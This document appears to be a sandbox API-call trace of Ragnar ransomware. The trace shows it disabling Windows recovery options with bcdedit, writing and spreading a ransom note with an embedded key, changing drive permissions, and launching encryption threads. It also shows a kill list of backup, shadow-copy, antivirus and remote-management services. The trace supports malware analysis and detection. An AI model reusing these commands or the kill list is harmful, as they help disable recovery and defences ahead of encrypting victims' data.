lpCommandLine="bcdedit /set {globalsettings} advancedoptions false", lpProcessInformation=0x32fc7a8*(hProcess=0x350, hThread=0x358, dwProcessId=0x1150, dwThreadId=0x115c)) returned 1 [0158.303] WaitForSingleObject (hHandle=0x350, dwMilliseconds=0xffffffff) returned 0x0 [0161.141] CloseHandle (hObject=0x350) returned 1 [0161.141] CloseHandle (hObject=0x358) returned 1 [0161.141] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0161.142] GetProcAddress (hModule=0x772d0000, lpProcName="Wow64EnableWow64FsRedirection") returned 0x77326eb0 [0161.143] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=1) returned 1 [0161.144] StrToIntA (lpSrc="4044") returned 4044 [0161.144] GetComputerNameW (in: lpBuffer=0x32fe3f8, nSize=0x32ff9c4 | out: lpBuffer="NQDPDE", nSize=0x32ff9c4) returned 1 [0161.144] VirtualAlloc (lpAddress=0x0, dwSize=0x7f, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0161.145] lstrlenW (lpString="NQDPDE") returned 6 [0161.145] wsprintfW (in: param_1=0x2f50000, param_2="%08X" | out: param_1="B8CF767A") returned 8 [0161.146] lstrcpyW (in: lpString1=0x32ff4d0, lpString2="\\" | out: lpString1="\\") returned="\\" [0161.146] lstrcpyW (in: lpString1=0xecc430, lpString2="!$R4GN4R_" | out: lpString1="!$R4GN4R_") returned="!$R4GN4R_" [0161.146] lstrcatW (in: lpString1="!$R4GN4R_", lpString2="B8CF767A" | out: lpString1="!$R4GN4R_B8CF767A") returned="!$R4GN4R_B8CF767A" [0161.146] lstrcatW (in: lpString1="!$R4GN4R_B8CF767A", lpString2="$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0161.146] lstrcatW (in: lpString1="\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\!$R4GN4R_B8CF767A$!.txt") returned="\\!$R4GN4R_B8CF767A$!.txt" [0161.146] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0xecc020, csidl=46, fCreate=0 | out: pszPath="C:\\Users\\Public\\Documents") returned 1 [0161.152] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents", lpString2="\\!$R4GN4R_B8CF767A$!.txt" | out: lpString1="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt") returned="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" [0161.152] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x32fcfc8, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0161.153] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpString2="\\!$R4GN4R_B8CF767A$!.txt" | out: lpString1="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\!$R4GN4R_B8CF767A$!.txt") returned="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\!$R4GN4R_B8CF767A$!.txt" [0161.153] lstrcpyA (in: lpString1=0x32ff850, lpString2="bC2aAD71E2976da53FC1Efc3193c8FDeA0BAeF8A37883c9e05d3BFF82CCfE8Ee" | out: lpString1="bC2aAD71E2976da53FC1Efc3193c8FDeA0BAeF8A37883c9e05d3BFF82CCfE8Ee") returned="bC2aAD71E2976da53FC1Efc3193c8FDeA0BAeF8A37883c9e05d3BFF82CCfE8Ee" [0161.153] lstrlenA (lpString="bC2aAD71E2976da53FC1Efc3193c8FDeA0BAeF8A37883c9e05d3BFF82CCfE8Ee") returned 64 [0161.153] GetProcessHeap () returned 0x3520000 [0161.153] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x58) returned 0x3556000 [0161.153] CryptBinaryToStringA (in: pbBinary=0x32ff850, cbBinary=0x40, dwFlags=0x40000001, pszString=0x0, pcchString=0x32ffa00 | out: pszString=0x0, pcchString=0x32ffa00) returned 1 [0161.154] GetProcessHeap () returned 0x3520000 [0161.154] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x59) returned 0x3551260 [0161.154] CryptBinaryToStringA (in: pbBinary=0x32ff850, cbBinary=0x40, dwFlags=0x40000001, pszString=0x3551260, pcchString=0x32ffa00 | out: pszString="YkMyYUFENzFFMjk3NmRhNTNGQzFFZmMzMTkzYzhGRGVBMEJBZUY4QTM3ODgzYzllMDVkM0JGRjgyQ0NmRThFZQ==", pcchString=0x32ffa00) returned 1 [0161.154] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x358 [0161.159] WriteFile (in: hFile=0x358, lpBuffer=0xecde70*, nNumberOfBytesToWrite=0xfcc, lpNumberOfBytesWritten=0x32ff9b8, lpOverlapped=0x0 | out: lpBuffer=0xecde70*, lpNumberOfBytesWritten=0x32ff9b8*=0xfcc, lpOverlapped=0x0) returned 1 [0161.161] wsprintfA (in: param_1=0x32ff7d0, param_2="\r\n%s\r\n\r\n%s\r\n%s\r\n%s\r\n\r\n%s\r\n" | out: param_1="\r\n***********************************************************************************\r\n\r\n---BEGIN KEY R_R---\r\nYkMyYUFENzFFMjk3NmRhNTNGQzFFZmMzMTkzYzhGRGVBMEJBZUY4QTM3ODgzYzllMDVkM0JGRjgyQ0NmRThFZQ==\r\n---END KEY R_R---\r\n\r\n***********************************************************************************\r\n") returned 306 [0161.161] lstrlenA (lpString="\r\n***********************************************************************************\r\n\r\n---BEGIN KEY R_R---\r\nYkMyYUFENzFFMjk3NmRhNTNGQzFFZmMzMTkzYzhGRGVBMEJBZUY4QTM3ODgzYzllMDVkM0JGRjgyQ0NmRThFZQ==\r\n---END KEY R_R---\r\n\r\n***********************************************************************************\r\n") returned 306 [0161.161] WriteFile (in: hFile=0x358, lpBuffer=0x32ff7d0*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x32ff9b8, lpOverlapped=0x0 | out: lpBuffer=0x32ff7d0*, lpNumberOfBytesWritten=0x32ff9b8*=0x132, lpOverlapped=0x0) returned 1 [0161.162] CloseHandle (hObject=0x358) returned 1 [0161.165] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0161.179] lstrcpyW (in: lpString1=0xecc840, lpString2=".ragn@r_" | out: lpString1=".ragn@r_") returned=".ragn@r_" [0161.179] lstrcatW (in: lpString1=".ragn@r_", lpString2="B8CF767A" | out: lpString1=".ragn@r_B8CF767A") returned=".ragn@r_B8CF767A" [0161.179] GetLogicalDrives () returned 0xc [0161.271] GetVolumeInformationW (in: lpRootPathName="D:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0161.272] GetDriveTypeW (lpRootPathName="D:\\") returned 0x3 [0161.272] GetWindowsDirectoryW (in: lpBuffer=0x32fc66c, uSize=0xfe | out: lpBuffer="C:\\WINDOWS") returned 0xa [0161.272] GetProcessHeap () returned 0x3520000 [0161.272] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x104) returned 0x35452a0 [0161.272] lstrcpyW (in: lpString1=0x32fb850, lpString2="\\\\?\\" | out: lpString1="\\\\?\\") returned="\\\\?\\" [0161.272] lstrcatW (in: lpString1="\\\\?\\", lpString2="D:\\" | out: lpString1="\\\\?\\D:\\") returned="\\\\?\\D:\\" [0161.272] GetNamedSecurityInfoW () returned 0x0 [0161.276] SetEntriesInAclW () returned 0x0 [0161.276] SetNamedSecurityInfoW () returned 0x0 [0161.292] LocalFree (hMem=0x3540660) returned 0x0 [0161.292] LocalFree (hMem=0x3540674) returned 0x3540674 [0161.292] LocalFree (hMem=0x353b700) returned 0x0 [0161.292] lstrcatW (in: lpString1="\\\\?\\D:\\", lpString2="*.*" | out: lpString1="\\\\?\\D:\\*.*") returned="\\\\?\\D:\\*.*" [0161.292] lstrcpyW (in: lpString1=0x35452a0, lpString2="\\\\?\\D:\\*.*" | out: lpString1="\\\\?\\D:\\*.*") returned="\\\\?\\D:\\*.*" [0161.292] lstrcpyW (in: lpString1=0x32fc060, lpString2="D:\\" | out: lpString1="D:\\") returned="D:\\" [0161.292] lstrcatW (in: lpString1="D:\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="D:\\!$R4GN4R_B8CF767A$!.txt") returned="D:\\!$R4GN4R_B8CF767A$!.txt" [0161.300] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="D:\\!$R4GN4R_B8CF767A$!.txt" (normalized: "d:\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0161.347] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec3a20, lpParameter=0x35452a0, dwCreationFlags=0x0, lpThreadId=0x32fb450 | out: lpThreadId=0x32fb450*=0x118c) returned 0x358 [0161.348] WaitForMultipleObjects (nCount=0x3, lpHandles=0x32fbc60*=0x358, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0xffffffff [0161.349] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0161.349] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0161.349] GetWindowsDirectoryW (in: lpBuffer=0x32fc66c, uSize=0xfe | out: lpBuffer="C:\\WINDOWS") returned 0xa [0161.349] GetProcessHeap () returned 0x3520000 [0161.349] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x104) returned 0x353cbc8 [0161.349] lstrcpyW (in: lpString1=0x32fb850, lpString2="\\\\?\\" | out: lpString1="\\\\?\\") returned="\\\\?\\" [0161.349] lstrcatW (in: lpString1="\\\\?\\", lpString2="C:\\" | out: lpString1="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0161.349] GetNamedSecurityInfoW () returned 0x0 [0161.350] SetEntriesInAclW () returned 0x0 [0161.350] SetNamedSecurityInfoW () returned 0x0 [0164.648] LocalFree (hMem=0x3540660) returned 0x0 [0164.649] LocalFree (hMem=0x3540674) returned 0x3540674 [0164.649] LocalFree (hMem=0x355e378) returned 0x0 [0164.649] lstrcatW (in: lpString1="\\\\?\\C:\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\*.*") returned="\\\\?\\C:\\*.*" [0164.649] lstrcpyW (in: lpString1=0x353cbc8, lpString2="\\\\?\\C:\\*.*" | out: lpString1="\\\\?\\C:\\*.*") returned="\\\\?\\C:\\*.*" [0164.649] lstrcpyW (in: lpString1=0x32fc060, lpString2="C:\\" | out: lpString1="C:\\") returned="C:\\" [0164.649] lstrcatW (in: lpString1="C:\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="C:\\!$R4GN4R_B8CF767A$!.txt") returned="C:\\!$R4GN4R_B8CF767A$!.txt" [0164.649] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="C:\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0164.655] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec3a20, lpParameter=0x353cbc8, dwCreationFlags=0x0, lpThreadId=0x32fb454 | out: lpThreadId=0x32fb454*=0x7f0) returned 0x350 [0164.656] WaitForMultipleObjects (nCount=0x3, lpHandles=0x32fbc60*=0x358, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0xffffffff [0164.656] WaitForMultipleObjects (nCount=0x2, lpHandles=0x32fbc60*=0x358, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0x11f8 Thread: id = 3 os_tid = 0xe70 Thread: id = 4 os_tid = 0x348 Thread: id = 5 os_tid = 0x704 [0086.281] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x355c588 [0086.306] EnumServicesStatusA (in: hSCManager=0x355c588, dwServiceType=0x3b, dwServiceState=0x3, lpServices=0x553fdc0, cbBufSize=0x24, pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64 | out: lpServices=0x553fdc0*(lpServiceName=0x0, lpDisplayName=0x0, ServiceStatus.dwServiceType=0x0, ServiceStatus.dwCurrentState=0x0, ServiceStatus.dwControlsAccepted=0x0, ServiceStatus.dwWin32ExitCode=0x0, ServiceStatus.dwServiceSpecificExitCode=0x0, ServiceStatus.dwCheckPoint=0x0, ServiceStatus.dwWaitHint=0x0), pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64) returned 0 [0090.530] GetLastError () returned 0xea [0090.530] GetProcessHeap () returned 0x3520000 [0090.531] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xead4) returned 0x35663d8 [0090.532] EnumServicesStatusA (in: hSCManager=0x355c588, dwServiceType=0x3b, dwServiceState=0x3, lpServices=0x35663d8, cbBufSize=0xead4, pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64 | out: lpServices=0x35663d8*(lpServiceName="1394ohci", lpDisplayName="1394 OHCI Compliant Host Controller", ServiceStatus.dwServiceType=0x1, ServiceStatus.dwCurrentState=0x1, ServiceStatus.dwControlsAccepted=0x0, ServiceStatus.dwWin32ExitCode=0x435, ServiceStatus.dwServiceSpecificExitCode=0x0, ServiceStatus.dwCheckPoint=0x0, ServiceStatus.dwWaitHint=0x0), pcbBytesNeeded=0x553fe78, lpServicesReturned=0x553fe80, lpResumeHandle=0x553fe64) returned 1 [0090.707] lstrcpyA (in: lpString1=0x553f9c0, lpString2="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v" | out: lpString1="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v") returned="vss,sql,memtas,mepocs,sophos,veeam,backup,pulseway,logme,logmein,connectwise,splashtop,mysql,Dfs,vmms,vmcompute,Hyper-v" [0090.708] StrStrIA (lpFirst="1394ohci", lpSrch="vss") returned 0x0 [0090.709] StrStrIA (lpFirst="3ware", lpSrch="vss") returned 0x0 [0090.709] StrStrIA (lpFirst="ACPI", lpSrch="vss") returned 0x0 [0090.709] StrStrIA (lpFirst="AcpiDev", lpSrch="vss") returned 0x0 [0090.709] StrStrIA (lpFirst="acpiex", lpSrch="vss") returned 0x0 [0090.709] StrStrIA (lpFirst="acpipagr", lpSrch="vss") returned 0x0 [0090.709] StrStrIA (lpFirst="AcpiPmi", lpSrch="vss") returned 0x0 [0090.709] StrStrIA (lpFirst="acpitime", lpSrch="vss") returned 0x0 [0090.709] StrStrIA (lpFirst="AdobeARMservice", lpSrch="vss") returned 0x0 [0090.710] StrStrIA (lpFirst="ADP80XX", lpSrch="vss") returned 0x0 [0090.710] StrStrIA (lpFirst="AFD", lpSrch="vss") returned 0x0 [0090.710] StrStrIA (lpFirst="ahcache", lpSrch="vss") returned 0x0 [0090.710] StrStrIA (lpFirst="AJRouter", lpSrch="vss") returned 0x0 [0090.710] StrStrIA (lpFirst="ALG", lpSrch="vss") returned 0x0 [0090.710] StrStrIA (lpFirst="AmdK8", lpSrch="vss") returned 0x0 [0090.710] StrStrIA (lpFirst="AmdPPM", lpSrch="vss") returned 0x0 [0090.710] StrStrIA (lpFirst="amdsata", lpSrch="vss") returned 0x0 [0090.710] StrStrIA (lpFirst="amdsbs", lpSrch="vss") returned 0x0 [0090.710] StrStrIA (lpFirst="amdxata", lpSrch="vss") returned 0x0 [0090.710] StrStrIA (lpFirst="AppID", lpSrch="vss") returned 0x0 [0090.710] StrStrIA (lpFirst="AppIDSvc", lpSrch="vss") returned 0x0 [0090.710] StrStrIA (lpFirst="Appinfo", lpSrch="vss") returned 0x0 [0090.710] StrStrIA (lpFirst="applockerfltr", lpSrch="vss") returned 0x0 [0090.710] StrStrIA (lpFirst="AppMgmt", lpSrch="vss") returned 0x0 [0090.710] StrStrIA (lpFirst="AppReadiness", lpSrch="vss") returned 0x0 [0090.711] StrStrIA (lpFirst="AppVClient", lpSrch="vss") returned 0x0 [0090.711] StrStrIA (lpFirst="AppvStrm", lpSrch="vss") returned 0x0 [0090.711] StrStrIA (lpFirst="AppvVemgr", lpSrch="vss") returned 0x0 [0090.711] StrStrIA (lpFirst="AppvVfs", lpSrch="vss") returned 0x0 [0090.711] StrStrIA (lpFirst="AppXSvc", lpSrch="vss") returned 0x0 [0090.711] StrStrIA (lpFirst="arcsas", lpSrch="vss") returned 0x0 [0090.711] StrStrIA (lpFirst="AsyncMac", lpSrch="vss") returned 0x0 [0090.711] StrStrIA (lpFirst="atapi", lpSrch="vss") returned 0x0 [0090.711] StrStrIA (lpFirst="AudioEndpointBuilder", lpSrch="vss") returned 0x0 [0090.711] StrStrIA (lpFirst="Audiosrv", lpSrch="vss") returned 0x0 [0090.711] StrStrIA (lpFirst="AxInstSV", lpSrch="vss") returned 0x0 [0090.711] StrStrIA (lpFirst="b06bdrv", lpSrch="vss") returned 0x0 [0090.711] StrStrIA (lpFirst="BasicDisplay", lpSrch="vss") returned 0x0 [0090.711] StrStrIA (lpFirst="BasicRender", lpSrch="vss") returned 0x0 [0090.712] StrStrIA (lpFirst="bcmfn", lpSrch="vss") returned 0x0 [0090.712] StrStrIA (lpFirst="bcmfn2", lpSrch="vss") returned 0x0 [0090.712] StrStrIA (lpFirst="BDESVC", lpSrch="vss") returned 0x0 [0090.712] StrStrIA (lpFirst="Beep", lpSrch="vss") returned 0x0 [0090.712] StrStrIA (lpFirst="BFE", lpSrch="vss") returned 0x0 [0090.712] StrStrIA (lpFirst="BITS", lpSrch="vss") returned 0x0 [0090.712] StrStrIA (lpFirst="bowser", lpSrch="vss") returned 0x0 [0090.712] StrStrIA (lpFirst="BrokerInfrastructure", lpSrch="vss") returned 0x0 [0090.712] StrStrIA (lpFirst="Browser", lpSrch="vss") returned 0x0 [0090.712] StrStrIA (lpFirst="BthAvrcpTg", lpSrch="vss") returned 0x0 [0090.712] StrStrIA (lpFirst="BthHFEnum", lpSrch="vss") returned 0x0 [0090.712] StrStrIA (lpFirst="bthhfhid", lpSrch="vss") returned 0x0 [0090.713] StrStrIA (lpFirst="BthHFSrv", lpSrch="vss") returned 0x0 [0090.713] StrStrIA (lpFirst="BTHMODEM", lpSrch="vss") returned 0x0 [0090.713] StrStrIA (lpFirst="bthserv", lpSrch="vss") returned 0x0 [0090.713] StrStrIA (lpFirst="buttonconverter", lpSrch="vss") returned 0x0 [0090.713] StrStrIA (lpFirst="CAD", lpSrch="vss") returned 0x0 [0090.713] StrStrIA (lpFirst="CapImg", lpSrch="vss") returned 0x0 [0090.713] StrStrIA (lpFirst="cdfs", lpSrch="vss") returned 0x0 [0090.713] StrStrIA (lpFirst="CDPSvc", lpSrch="vss") returned 0x0 [0090.713] StrStrIA (lpFirst="cdrom", lpSrch="vss") returned 0x0 [0090.713] StrStrIA (lpFirst="CertPropSvc", lpSrch="vss") returned 0x0 [0090.713] StrStrIA (lpFirst="cht4iscsi", lpSrch="vss") returned 0x0 [0090.713] StrStrIA (lpFirst="cht4vbd", lpSrch="vss") returned 0x0 [0090.713] StrStrIA (lpFirst="circlass", lpSrch="vss") returned 0x0 [0090.713] StrStrIA (lpFirst="CldFlt", lpSrch="vss") returned 0x0 [0090.713] StrStrIA (lpFirst="CLFS", lpSrch="vss") returned 0x0 [0090.713] StrStrIA (lpFirst="ClickToRunSvc", lpSrch="vss") returned 0x0 [0090.714] StrStrIA (lpFirst="ClipSVC", lpSrch="vss") returned 0x0 [0090.714] StrStrIA (lpFirst="clreg", lpSrch="vss") returned 0x0 [0090.714] StrStrIA (lpFirst="CmBatt", lpSrch="vss") returned 0x0 [0090.714] StrStrIA (lpFirst="CNG", lpSrch="vss") returned 0x0 [0090.714] StrStrIA (lpFirst="cnghwassist", lpSrch="vss") returned 0x0 [0090.714] StrStrIA (lpFirst="CompositeBus", lpSrch="vss") returned 0x0 [0090.714] StrStrIA (lpFirst="COMSysApp", lpSrch="vss") returned 0x0 [0090.714] StrStrIA (lpFirst="condrv", lpSrch="vss") returned 0x0 [0090.714] StrStrIA (lpFirst="CoreMessagingRegistrar", lpSrch="vss") returned 0x0 [0090.714] StrStrIA (lpFirst="CryptSvc", lpSrch="vss") returned 0x0 [0090.714] StrStrIA (lpFirst="CSC", lpSrch="vss") returned 0x0 [0090.714] StrStrIA (lpFirst="CscService", lpSrch="vss") returned 0x0 [0090.714] StrStrIA (lpFirst="dam", lpSrch="vss") returned 0x0 [0090.714] StrStrIA (lpFirst="DcomLaunch", lpSrch="vss") returned 0x0 [0090.714] StrStrIA (lpFirst="defragsvc", lpSrch="vss") returned 0x0 [0090.714] StrStrIA (lpFirst="DeviceAssociationService", lpSrch="vss") returned 0x0 [0090.715] StrStrIA (lpFirst="DeviceInstall", lpSrch="vss") returned 0x0 [0090.715] StrStrIA (lpFirst="DevQueryBroker", lpSrch="vss") returned 0x0 [0090.715] StrStrIA (lpFirst="Dfsc", lpSrch="vss") returned 0x0 [0090.715] StrStrIA (lpFirst="Dhcp", lpSrch="vss") returned 0x0 [0090.715] StrStrIA (lpFirst="diagnosticshub.standardcollector.service", lpSrch="vss") returned 0x0 [0090.715] StrStrIA (lpFirst="DiagTrack", lpSrch="vss") returned 0x0 [0090.715] StrStrIA (lpFirst="Disk", lpSrch="vss") returned 0x0 [0090.715] StrStrIA (lpFirst="DmEnrollmentSvc", lpSrch="vss") returned 0x0 [0090.715] StrStrIA (lpFirst="dmvsc", lpSrch="vss") returned 0x0 [0090.715] StrStrIA (lpFirst="dmwappushservice", lpSrch="vss") returned 0x0 [0090.715] StrStrIA (lpFirst="Dnscache", lpSrch="vss") returned 0x0 [0090.715] StrStrIA (lpFirst="DoSvc", lpSrch="vss") returned 0x0 [0090.715] StrStrIA (lpFirst="dot3svc", lpSrch="vss") returned 0x0 [0090.715] StrStrIA (lpFirst="DPS", lpSrch="vss") returned 0x0 [0090.716] StrStrIA (lpFirst="drmkaud", lpSrch="vss") returned 0x0 [0090.716] StrStrIA (lpFirst="DsmSvc", lpSrch="vss") returned 0x0 [0090.716] StrStrIA (lpFirst="DsSvc", lpSrch="vss") returned 0x0 [0090.716] StrStrIA (lpFirst="DusmSvc", lpSrch="vss") returned 0x0 [0090.716] StrStrIA (lpFirst="DXGKrnl", lpSrch="vss") returned 0x0 [0090.716] StrStrIA (lpFirst="e1iexpress", lpSrch="vss") returned 0x0 [0090.716] StrStrIA (lpFirst="EapHost", lpSrch="vss") returned 0x0 [0090.716] StrStrIA (lpFirst="ebdrv", lpSrch="vss") returned 0x0 [0090.716] StrStrIA (lpFirst="EFS", lpSrch="vss") returned 0x0 [0090.716] StrStrIA (lpFirst="EhStorClass", lpSrch="vss") returned 0x0 [0090.716] StrStrIA (lpFirst="EhStorTcgDrv", lpSrch="vss") returned 0x0 [0090.716] StrStrIA (lpFirst="embeddedmode", lpSrch="vss") returned 0x0 [0090.716] StrStrIA (lpFirst="EntAppSvc", lpSrch="vss") returned 0x0 [0090.716] StrStrIA (lpFirst="ErrDev", lpSrch="vss") returned 0x0 [0090.717] StrStrIA (lpFirst="EventLog", lpSrch="vss") returned 0x0 [0090.717] StrStrIA (lpFirst="EventSystem", lpSrch="vss") returned 0x0 [0090.717] StrStrIA (lpFirst="exfat", lpSrch="vss") returned 0x0 [0090.717] StrStrIA (lpFirst="fastfat", lpSrch="vss") returned 0x0 [0090.717] StrStrIA (lpFirst="Fax", lpSrch="vss") returned 0x0 [0090.717] StrStrIA (lpFirst="fdc", lpSrch="vss") returned 0x0 [0090.717] StrStrIA (lpFirst="fdPHost", lpSrch="vss") returned 0x0 [0090.717] StrStrIA (lpFirst="FDResPub", lpSrch="vss") returned 0x0 [0090.717] StrStrIA (lpFirst="fhsvc", lpSrch="vss") returned 0x0 [0090.717] StrStrIA (lpFirst="FileCrypt", lpSrch="vss") returned 0x0 [0090.717] StrStrIA (lpFirst="FileInfo", lpSrch="vss") returned 0x0 [0090.717] StrStrIA (lpFirst="Filetrace", lpSrch="vss") returned 0x0 [0090.717] StrStrIA (lpFirst="flpydisk", lpSrch="vss") returned 0x0 [0090.717] StrStrIA (lpFirst="FltMgr", lpSrch="vss") returned 0x0 [0090.717] StrStrIA (lpFirst="FontCache", lpSrch="vss") returned 0x0 [0090.717] StrStrIA (lpFirst="FontCache3.0.0.0", lpSrch="vss") returned 0x0 [0090.718] StrStrIA (lpFirst="FrameServer", lpSrch="vss") returned 0x0 [0090.718] StrStrIA (lpFirst="FsDepends", lpSrch="vss") returned 0x0 [0090.718] StrStrIA (lpFirst="fvevol", lpSrch="vss") returned 0x0 [0090.718] StrStrIA (lpFirst="gencounter", lpSrch="vss") returned 0x0 [0090.718] StrStrIA (lpFirst="genericusbfn", lpSrch="vss") returned 0x0 [0090.718] StrStrIA (lpFirst="GPIOClx0101", lpSrch="vss") returned 0x0 [0090.718] StrStrIA (lpFirst="gpsvc", lpSrch="vss") returned 0x0 [0090.718] StrStrIA (lpFirst="GpuEnergyDrv", lpSrch="vss") returned 0x0 [0090.718] StrStrIA (lpFirst="gupdate", lpSrch="vss") returned 0x0 [0090.718] StrStrIA (lpFirst="gupdatem", lpSrch="vss") returned 0x0 [0090.718] StrStrIA (lpFirst="HdAudAddService", lpSrch="vss") returned 0x0 [0090.718] StrStrIA (lpFirst="HDAudBus", lpSrch="vss") returned 0x0 [0090.718] StrStrIA (lpFirst="HidBatt", lpSrch="vss") returned 0x0 [0090.718] StrStrIA (lpFirst="HidBth", lpSrch="vss") returned 0x0 [0090.718] StrStrIA (lpFirst="hidi2c", lpSrch="vss") returned 0x0 [0090.718] StrStrIA (lpFirst="hidinterrupt", lpSrch="vss") returned 0x0 [0090.718] StrStrIA (lpFirst="HidIr", lpSrch="vss") returned 0x0 [0090.718] StrStrIA (lpFirst="hidserv", lpSrch="vss") returned 0x0 [0090.719] StrStrIA (lpFirst="HidUsb", lpSrch="vss") returned 0x0 [0090.719] StrStrIA (lpFirst="HomeGroupListener", lpSrch="vss") returned 0x0 [0090.719] StrStrIA (lpFirst="HomeGroupProvider", lpSrch="vss") returned 0x0 [0090.719] StrStrIA (lpFirst="HpSAMD", lpSrch="vss") returned 0x0 [0090.719] StrStrIA (lpFirst="HTTP", lpSrch="vss") returned 0x0 [0090.719] StrStrIA (lpFirst="HvHost", lpSrch="vss") returned 0x0 [0090.719] StrStrIA (lpFirst="hvservice", lpSrch="vss") returned 0x0 [0090.719] StrStrIA (lpFirst="hwpolicy", lpSrch="vss") returned 0x0 [0090.719] StrStrIA (lpFirst="hyperkbd", lpSrch="vss") returned 0x0 [0090.719] StrStrIA (lpFirst="i8042prt", lpSrch="vss") returned 0x0 [0090.719] StrStrIA (lpFirst="iagpio", lpSrch="vss") returned 0x0 [0090.719] StrStrIA (lpFirst="iai2c", lpSrch="vss") returned 0x0 [0090.719] StrStrIA (lpFirst="iaLPSS2i_GPIO2", lpSrch="vss") returned 0x0 [0090.719] StrStrIA (lpFirst="iaLPSS2i_GPIO2_BXT_P", lpSrch="vss") returned 0x0 [0090.719] StrStrIA (lpFirst="iaLPSS2i_I2C", lpSrch="vss") returned 0x0 [0090.719] StrStrIA (lpFirst="iaLPSS2i_I2C_BXT_P", lpSrch="vss") returned 0x0 [0090.719] StrStrIA (lpFirst="iaLPSSi_GPIO", lpSrch="vss") returned 0x0 [0090.719] StrStrIA (lpFirst="iaLPSSi_I2C", lpSrch="vss") returned 0x0 [0090.719] StrStrIA (lpFirst="iaStorAV", lpSrch="vss") returned 0x0 [0090.720] StrStrIA (lpFirst="iaStorV", lpSrch="vss") returned 0x0 [0090.720] StrStrIA (lpFirst="ibbus", lpSrch="vss") returned 0x0 [0090.720] StrStrIA (lpFirst="icssvc", lpSrch="vss") returned 0x0 [0090.720] StrStrIA (lpFirst="IKEEXT", lpSrch="vss") returned 0x0 [0090.720] StrStrIA (lpFirst="IndirectKmd", lpSrch="vss") returned 0x0 